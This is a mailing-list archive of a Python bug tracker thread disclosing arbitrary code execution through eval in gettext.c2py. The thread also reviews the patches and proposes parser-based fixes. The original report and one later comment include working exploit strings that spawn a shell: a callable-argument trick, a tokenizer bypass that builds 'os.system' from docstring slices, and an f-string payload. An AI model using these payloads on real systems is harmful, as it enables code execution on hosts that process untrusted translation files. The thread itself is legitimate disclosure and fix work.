[issue28563] Arbitrary code execution in gettext.c2py

2016-11-08 Thread Carl Ekerot

Carl Ekerot added the comment:

Looks good to me. It behaves as intended on every input I can think of.

--

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue28563>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue28563] Arbitrary code execution in gettext.c2py

2016-11-07 Thread Carl Ekerot

Carl Ekerot added the comment:

Judging by the code, this seems to be a much more rigid implementation. I've 
only run the unit tests and some variations of my initial examples, and 
everything seems to work as intended. Will look at it more closely this 
afternoon.

One thing that caught my attention in the patch is that gettext.c2py is removed 
entirely. I know that this function is not exposed in the docs or in __all__, 
but it still has "public scope" and it's likely used directly in the wild 
(googling the signature confirms this). Perhaps it should emit a 
DeprecationWarning and delegate to _Plural?
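
A minimal sketch of what such a compatibility shim could look like. The helper name `_plural_impl` is hypothetical and only stands in for whatever safe implementation the patch provides; it is not the patch's actual API, and it handles a single trivial rule to keep the example short.

```python
import warnings


def _plural_impl(plural):
    # Hypothetical stand-in for the patched, safe implementation.
    # It only understands the rule "n != 1" so the sketch stays short.
    if plural.replace(" ", "") != "n!=1":
        raise ValueError("unsupported plural expression in this sketch")
    return lambda n: int(n != 1)


def c2py(plural):
    """Old public name, kept so existing callers keep working."""
    warnings.warn(
        "c2py() is deprecated; the name is kept only for compatibility",
        DeprecationWarning,
        stacklevel=2,  # attribute the warning to the caller of c2py()
    )
    return _plural_impl(plural)
```

Existing callers would keep getting a plural function back, while the warning gives them time to migrate.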




[issue28563] Arbitrary code execution in gettext.c2py

2016-11-05 Thread Carl Ekerot

Carl Ekerot added the comment:

> The gettext module might be vulnerable to f-string attacks

It is. See the example in the first comment:

   gettext.c2py('f"{os.system(\'sh\')}"')(0)

This vulnerability seems to be solved in Xiang's patch. The DoS aspect is 
interesting though, since there are no constraints against malicious use of the 
power operator, say "9**9**9**..**9". This too would be solved by implementing 
a parser that supports only simple arithmetic.
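
To give a feel for the cost, the size of such a power tower can be estimated without computing it. The helper name below is made up for illustration; it uses the identity digits(b**e) = floor(e * log10(b)) + 1.

```python
import math


def power_digits(base, exponent):
    """Approximate number of decimal digits of base**exponent.

    Uses logarithms, so the huge power itself is never computed.
    """
    return math.floor(exponent * math.log10(base)) + 1
```

Since ** is right-associative, "9**9**9" means 9**(9**9), and power_digits(9, 9**9) comes out at roughly 370 million digits. Each additional "**9" makes the result infeasible to compute at all.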




[issue28563] Arbitrary code execution in gettext.c2py

2016-11-05 Thread Carl Ekerot

Carl Ekerot added the comment:

Verified gettext.c2py with gettext_c2py.patch applied against the plural forms 
actually used in localization, listed at 
http://docs.translatehouse.org/projects/localization-guide/en/latest/l10n/pluralforms.html
I tested all of the non-trivial forms, and from what I can tell they generate 
valid syntax and are correct.




[issue28563] Arbitrary code execution in gettext.c2py

2016-11-04 Thread Carl Ekerot

Carl Ekerot added the comment:

It doesn't solve the case when an identifier or number is used as a function:

   >>> import os
   >>> gettext.c2py("n()")(lambda: os.system("sh"))
   $ 
   0
   >>> gettext.c2py("1()")(0)
   Traceback (most recent call last):
     File "<stdin>", line 1, in <module>
     File "<string>", line 1, in <lambda>
   TypeError: 'int' object is not callable

This is more of an unintended behavior than a security issue.

Xiang Zhang: I've created a patch based on yours which handles the above case. 
I've also added a corresponding test case.

IMO it would be even better if we could avoid eval. One possible (and safe) way 
would be to construct a safe subset of Python using the ast module. This would 
however still require that the C-style syntax is translated to Python. As you 
mention, there are issues parsing and translating nested ternary operators, and 
I doubt it will be possible to cover all cases with the regex replace utilized 
today.
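
A rough sketch of the ast idea, assuming Python 3.8+ (where numeric literals parse to `ast.Constant`) and assuming the C expression has already been translated to Python syntax. The function name and the exact set of allowed nodes are illustrative choices, not what any of the attached patches do.

```python
import ast

# Node types allowed in a translated plural expression (illustrative set).
_ALLOWED_NODES = (
    ast.Expression, ast.BoolOp, ast.BinOp, ast.UnaryOp, ast.IfExp,
    ast.Compare, ast.Name, ast.Load, ast.Constant,
    ast.And, ast.Or, ast.Not,
    ast.Add, ast.Sub, ast.Mult, ast.FloorDiv, ast.Mod,
    ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
)


def check_plural_ast(py_expr):
    """Parse py_expr and reject anything outside the allowed subset."""
    tree = ast.parse(py_expr, mode="eval")
    for node in ast.walk(tree):
        if not isinstance(node, _ALLOWED_NODES):
            # Calls, attribute access, f-strings, ** and so on end up here.
            raise ValueError("disallowed syntax: %s" % type(node).__name__)
        if isinstance(node, ast.Name) and node.id != "n":
            raise ValueError("disallowed name: %r" % node.id)
        if isinstance(node, ast.Constant) and type(node.value) is not int:
            raise ValueError("disallowed constant: %r" % (node.value,))
    return tree
```

With this, "n()" fails on the Call node, an f-string fails on JoinedStr, and "9**9" fails on Pow. The returned tree could then be compiled or walked by a small interpreter.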

--
Added file: http://bugs.python.org/file45349/gettext_c2py_func.patch




[issue28563] Arbitrary code execution in gettext.c2py

2016-10-30 Thread Carl Ekerot

New submission from Carl Ekerot:

The c2py function in the gettext module is seriously flawed in many ways due
to its use of eval to create a plural function:

   return eval('lambda n: int(%s)' % plural)

My first discovery was that nothing prevents an input plural string that
resembles a function call:

   gettext.c2py("n()")(lambda: os.system("sh"))

This is of course a low-risk bug, since it requires control of both the plural
function string and the argument.

Gaining arbitrary code execution using only the plural function string requires
that the security checks are bypassed. The security checks use the tokenize
module to make sure that the string contains no NAME tokens other than "n".
However, they do not check whether tokenizing produced any token.ERRORTOKEN.
Hence, the following input will pass the security checks:

   gettext.c2py( '"(eval(foo) && ""'  )(0)

   ----> 1 gettext.c2py( '"(eval(foo) && ""'  )(0)
   gettext.pyc in <lambda>(n)
   NameError: global name 'foo' is not defined

The check passes because the tokenizer reads the input as a STRING token
followed by an ERRORTOKEN, so it never sees a NAME token.

Passing a string in the argument to eval will however break the exploit since
the parser will read the start-of-string in the eval argument as end-of-string,
and the eval argument will be read as a NAME-token.

Instead of passing a string to eval, we can build a string from characters in
the docstrings available in the context of the gettext module:

   gettext.c2py('"(eval('
   'os.__doc__[152:155] + '  # os.
   'os.__doc__[46:52] + '    # system
   'os.__doc__[318] + '      # (
   'os.__doc__[55] + '       # '
   'os.__doc__[10] + '       # s
   'os.__doc__[42] + '       # h
   'os.__doc__[55] + '       # '
   'os.__doc__[329]'         # )
   ') && ""')(0)

This will successfully spawn a shell in Python 2.7.11.

Bonus: With the new f-strings (formatted string literals) in Python 3.6,
exploiting gettext.c2py becomes trivial:

   gettext.c2py('f"{os.system(\'sh\')}"')(0)

The tokenizer will recognize the entire format-string as just a string, thus
bypassing the security checks.
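
As a rough illustration of a stricter pre-check, one could allow only the characters that can occur in a plural expression instead of looking for forbidden NAME tokens. This is a sketch, not the check used by gettext; the function name is invented, and it is only a coarse filter: inputs such as "n()" or "9**9" still pass, so it does not replace a real parser.

```python
import re

# Characters that can appear in a C plural expression: the variable n,
# decimal digits, whitespace, parentheses and operator characters.
_PLURAL_ALPHABET = re.compile(r"[n0-9\s()?:!<>=&|%*/+\-]*")


def looks_like_plural(plural):
    """Return True if plural contains only characters from the allowlist."""
    return _PLURAL_ALPHABET.fullmatch(plural) is not None
```

Quotes and letters other than "n" are outside the allowlist, so both the STRING-token trick and the f-string payload are rejected before any tokenizing or evaluation takes place.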

To mitigate these vulnerabilities, eval should be avoided by implementing a
custom parser for the gettext plural function DSL.
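
A minimal sketch of such a parser, to show that the DSL is small enough to handle without eval. All names are illustrative. It assumes the usual C precedence for ?:, ||, &&, comparisons, + - and * / %, does not short-circuit && and ||, uses Python's // and % (which differ from C for negative operands), and places no limit on nesting depth.

```python
import operator
import re

_TOKEN_RE = re.compile(r"\s*(?:(\d+)|(n)|(\|\||&&|[=!<>]=|[-+*/%<>!?:()]))")

# Binary operators grouped by C precedence, loosest binding first.
_LEVELS = [
    {"||": lambda a, b: bool(a) or bool(b)},
    {"&&": lambda a, b: bool(a) and bool(b)},
    {"==": operator.eq, "!=": operator.ne},
    {"<": operator.lt, ">": operator.gt, "<=": operator.le, ">=": operator.ge},
    {"+": operator.add, "-": operator.sub},
    {"*": operator.mul, "/": operator.floordiv, "%": operator.mod},
]


def _tokenize(text):
    tokens, pos = [], 0
    text = text.rstrip()
    while pos < len(text):
        match = _TOKEN_RE.match(text, pos)
        if match is None:  # quotes, letters other than n, "**" pieces, ...
            raise ValueError("unexpected input near offset %d" % pos)
        tokens.append(match.group(match.lastindex))
        pos = match.end()
    return tokens


class _Parser:
    def __init__(self, tokens):
        self.tokens, self.pos = tokens, 0

    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def take(self, expected=None):
        tok = self.peek()
        if tok is None or (expected is not None and tok != expected):
            raise ValueError("expected %r, got %r" % (expected or "operand", tok))
        self.pos += 1
        return tok

    def ternary(self):
        cond = self.binary(0)
        if self.peek() != "?":
            return cond
        self.take("?")
        if_true = self.ternary()
        self.take(":")
        if_false = self.ternary()
        # Only the selected branch is evaluated when the function is called.
        return lambda n: if_true(n) if cond(n) else if_false(n)

    def binary(self, level):
        if level == len(_LEVELS):
            return self.unary()
        left = self.binary(level + 1)
        while self.peek() in _LEVELS[level]:
            op = _LEVELS[level][self.take()]
            right = self.binary(level + 1)
            # Bind the current operands now; both sides are always evaluated.
            left = (lambda l, r, f: lambda n: int(f(l(n), r(n))))(left, right, op)
        return left

    def unary(self):
        tok = self.take()
        if tok == "!":
            operand = self.unary()
            return lambda n: int(not operand(n))
        if tok == "(":
            inner = self.ternary()
            self.take(")")
            return inner
        if tok == "n":
            return lambda n: n
        if tok.isdigit():
            value = int(tok)
            return lambda n: value
        raise ValueError("unexpected token %r" % tok)


def c_plural(text):
    """Turn a C plural expression into a Python function of n, without eval."""
    parser = _Parser(_tokenize(text))
    func = parser.ternary()
    if parser.peek() is not None:
        raise ValueError("unexpected token %r" % parser.peek())
    return func
```

For example, c_plural("n != 1") returns a function mapping 1 to 0 and every other count to 1, while "n()", "9**9" and both exploit strings above raise ValueError because they fall outside the grammar.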

--
components: Library (Lib)
messages: 279734
nosy: Carl Ekerot
priority: normal
severity: normal
status: open
title: Arbitrary code execution in gettext.c2py
type: security
versions: Python 2.7, Python 3.3, Python 3.4, Python 3.5, Python 3.6, Python 3.7
